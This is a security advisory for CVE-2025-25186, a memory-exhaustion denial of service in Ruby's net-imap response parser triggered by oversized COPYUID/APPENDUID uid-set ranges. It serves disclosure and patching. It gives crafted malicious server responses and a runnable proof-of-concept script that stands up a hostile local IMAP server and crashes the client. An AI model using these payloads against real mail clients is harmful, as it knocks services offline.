CVE-2025-25186: Net::IMAP vulnerable to possible DoS by memory exhaustion

Summary There is a possibility for denial of service by memory exhaustion in net-imap's response parser. At any time while the client is connected, a malicious server can send can send highly compressed uid-set data which is automatically read by the client's receiver thread. The response parser uses Range#toa to convert the uid-set data into arrays of integers, with no limitation on the expanded size of the ranges.

Details IMAP's uid-set and sequence-set formats can compress ranges of numbers, for example: "1,2,3,4,5" and "1:5" both represent the same set. When Net::IMAP::ResponseParser receives APPENDUID or COPYUID response codes, it expands each uid-set into an array of integers. On a 64 bit system, these arrays will expand to 8 bytes for each number in the set. A malicious IMAP server may send specially crafted APPENDUID or COPYUID responses with very large uid-set ranges.

The Net::IMAP client parses each server response in a separate thread, as soon as each responses is received from the server. This attack works even when the client does not handle the APPENDUID or COPYUID responses.

Malicious inputs:

ruby 40 bytes expands to ~1.6GB: " OK [COPYUID 1 1:99999999 1:99999999]\r\n"

Worst valid input scenario (using uint32 max), 44 bytes expands to 64GiB: " OK [COPYUID 1 1:4294967295 1:4294967295]\r\n"

Numbers must be non-zero uint32, but this isn't validated. Arrays larger than UINT32MAX can be created. For example, the following would theoretically expand to almost 800 exabytes: " OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\r\n"

Simple way to test this: ruby require "net/imap"

def test(size) input = "A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\r\n" parser = Net::IMAP::ResponseParser.new parser.parse input end

test(99999999)

Fixes

Preferred Fix, minor API changes Upgrade to v0.4.19, v0.5.6, or higher, and configure: ruby globally Net::IMAP.config.parserusedeprecateduidplusdata = false per-client imap = Net::IMAP.new(hostname, ssl: true, parserusedeprecateduidplusdata: false) imap.config.parserusedeprecateduidplusdata = false

This replaces UIDPlusData with AppendUIDData and CopyUIDData. These classes store their UIDs as Net::IMAP::SequenceSet objects (not expanded into arrays of integers). Code that does not handle APPENDUID or COPYUID responses will not notice any difference. Code that does handle these responses may need to be updated. See the documentation for UIDPlusData, AppendUIDData and CopyUIDData.

For v0.3.8, this option is not available. For v0.4.19, the default value is true. For v0.5.6, the default value is :uptomaxsize. For v0.6.0, the only allowed value will be false (UIDPlusData will be removed from v0.6).

Mitigation, backward compatible API Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher.

For backward compatibility, uid-set can still be expanded into an array, but a maximum limit will be applied.

Assign config.parsermaxdeprecateduidplusdatasize to set the maximum UIDPlusData UID set size. When config.parserusedeprecateduidplusdata == true, larger sets will raise Net::IMAP::ResponseParseError. When config.parserusedeprecateduidplusdata == :uptomaxsize, larger sets will use AppendUIDData or CopyUIDData.

For v0.3,8, this limit is hard-coded to 10,000, and larger sets will always raise Net::IMAP::ResponseParseError. For v0.4.19, the limit defaults to 1000. For v0.5.6, the limit defaults to 100. For v0.6.0, the limit will be ignored (UIDPlusData will be removed from v0.6).

Please Note: unhandled responses If the client does not add response handlers to prune unhandled responses, a malicious server can still eventually exhaust all client memory, by repeatedly sending malicious responses. However, net-imap has always retained unhandled responses, and it has always been necessary for long-lived connections to prune these responses. This is not significantly different from connecting to a trusted server with a long-lived connection. To limit the maximum number of retained responses, a simple handler might look something like the following:

ruby limit = 1000 imap.addresponsehandler do |resp| next unless resp.respondto?(:name) && resp.respondto?(:data) name = resp.name code = resp.data.code&.name if resp.data.respondto?(:code) if Net::IMAP::VERSION > "0.4.0" imap.responses(name) { 1.slice!(0...-limit) } imap.responses(code) { 1.slice!(0...-limit) } else imap.responses(name).slice!(0...-limit) imap.responses(code).slice!(0...-limit) end end

Proof of concept

Save the following to a ruby file (e.g: poc.rb) and make it executable: ruby #!/usr/bin/env ruby require 'socket' require 'net/imap'

if !defined?(Net::IMAP.config) puts "Net::IMAP.config is not available" elsif !Net::IMAP.config.respondto?(:parserusedeprecateduidplusdata) puts "Net::IMAP.config.parserusedeprecateduidplusdata is not available" else Net::IMAP.config.parserusedeprecateduidplusdata = :uptomaxsize puts "Updated parserusedeprecateduidplusdata to :uptomaxsize" end

size = Integer(ENV["UIDSETSIZE"] || 232-1)

def serveraddr Addrinfo.tcp("localhost", 0).ipaddress end

def createtcpserver TCPServer.new(serveraddr, 0) end

def startserver th = Thread.new do yield end sleep 0.1 until th.stop? end

def copyuidresponse(tag: "", size: 232-1, text: "too large?") "#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\r\n" end

def appenduidresponse(tag: "", size: 232-1, text: "too large?") "#{tag} OK [APPENDUID 1 1:#{size}] #{text}\r\n" end

server = createtcpserver port = server.addr[1] puts "Server started on port #{port}"

server startserver do sock = server.accept begin sock.print " OK test server\r\n" cmd = sock.gets("\r\n", chomp: true) tag = cmd.match(/\A(\w+) /)[1] puts "Received: #{cmd}"

maliciousresponse = appenduidresponse(size:) puts "Sending: #{maliciousresponse.chomp}" sock.print maliciousresponse

maliciousresponse = copyuidresponse(size:) puts "Sending: #{maliciousresponse.chomp}" sock.print maliciousresponse sock.print " CAPABILITY JUMBO=UIDPLUS PROOFOFCONCEPT\r\n" sock.print "#{tag} OK CAPABILITY completed\r\n"

cmd = sock.gets("\r\n", chomp: true) tag = cmd.match(/\A(\w+) /)[1] puts "Received: #{cmd}" sock.print " BYE If you made it this far, you passed the test!\r\n" sock.print "#{tag} OK LOGOUT completed\r\n" rescue Exception => ex puts "Error in server: #{ex.message} (#{ex.class})" ensure sock.close server.close end end

client begin puts "Client connecting,.." imap = Net::IMAP.new(serveraddr, port: port) puts "Received capabilities: #{imap.capability}" pp responses: imap.responses imap.logout rescue Exception => ex puts "Error in client: #{ex.message} (#{ex.class})" puts ex.fullmessage ensure imap.disconnect if imap end

Use ulimit to limit the process's virtual memory. The following example limits virtual memory to 1GB: console $ ( ulimit -v 1000000 && exec ./poc.rb ) Server started on port 34291 Client connecting,.. Received: RUBY0001 CAPABILITY Sending: OK [APPENDUID 1 1:4294967295] too large? Sending: OK [COPYUID 1 1:4294967295 1:4294967295] too large? Error in server: Connection reset by peer @ iofillbuf - fd:9 (Errno::ECONNRESET) Error in client: failed to allocate memory (NoMemoryError) /gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#gettaggedresponse': failed to allocate memory (NoMemoryError) from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#sendcommand' from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize' from /rubylibdir/monitor.rb:201:in 'MonitorMixin#monsynchronize' from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#sendcommand' from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability' from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize' from /rubylibdir/monitor.rb:201:in 'MonitorMixin#monsynchronize' from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability' from /workspace/poc.rb:70:in '<main>'